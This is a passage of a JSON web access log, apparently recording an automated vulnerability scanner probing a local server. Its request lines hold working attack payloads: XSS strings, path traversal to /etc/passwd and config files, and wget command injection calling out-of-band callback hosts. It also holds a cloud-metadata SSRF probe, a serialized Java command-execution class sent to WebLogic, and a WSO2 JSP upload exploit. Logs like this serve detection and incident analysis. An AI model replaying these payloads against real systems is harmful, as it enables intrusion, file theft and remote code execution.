HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExececho${IFS}COP-9272-9102-EVC|revconnectionHandlertrue]]>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"type=url&data=http%3A%2F%2Fc9v8hs0smpv8c6ag07h0q4ictu59h9hhz.oast.online%2F&xmlaction=preview&node=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"cmd=id&opts=&timeout=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/297MdtTaGLtuIvzsEe7kqcU5DVl.cfm HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rootDesc.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Thumbs.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"alibaba.interact.sh","request":"GET http://alibaba.interact.sh/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"username={{username}}&password={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicletitle\x22\x0D\x0A\x0D\x0ATest\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22brandname\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicalorcview\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22priceperday\x22\x0D\x0A\x0D\x0A500\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22fueltype\x22\x0D\x0A\x0D\x0APetrol\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22modelyear\x22\x0D\x0A\x0D\x0A2022\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22seatingcapacity\x22\x0D\x0A\x0D\x0A5\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img1\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img2\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img3\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img4\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img5\x22; filename=\x22\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22submit\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/post-avehical.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2Fc9v8hs0smpv8c6ag07h0ycgqcxezk9wi4.oast.online%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fc9v8hs0smpv8c6ag07h0zx1bkppibmh3c.oast.online%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MbFziLF8BhL6qhLrWCZR9SK9/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"username=showdoc&password=123456&v_code=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /server/index.php?s=/api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-----------------------------250033711231076532771336998311\x0D\x0AContent-Disposition: form-data; name=\x22../../../../repository/deployment/server/webapps/authenticationendpoint/297mdq8fdatfgvocyaru2vorkyk.jsp\x22;filename=\x22test.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<% out.print(\x22WSO2-RCE-CVE-2022-29464\x22); %>\x0D\x0A-----------------------------250033711231076532771336998311--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileupload/toolsAny HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/mobile/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%3B/monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 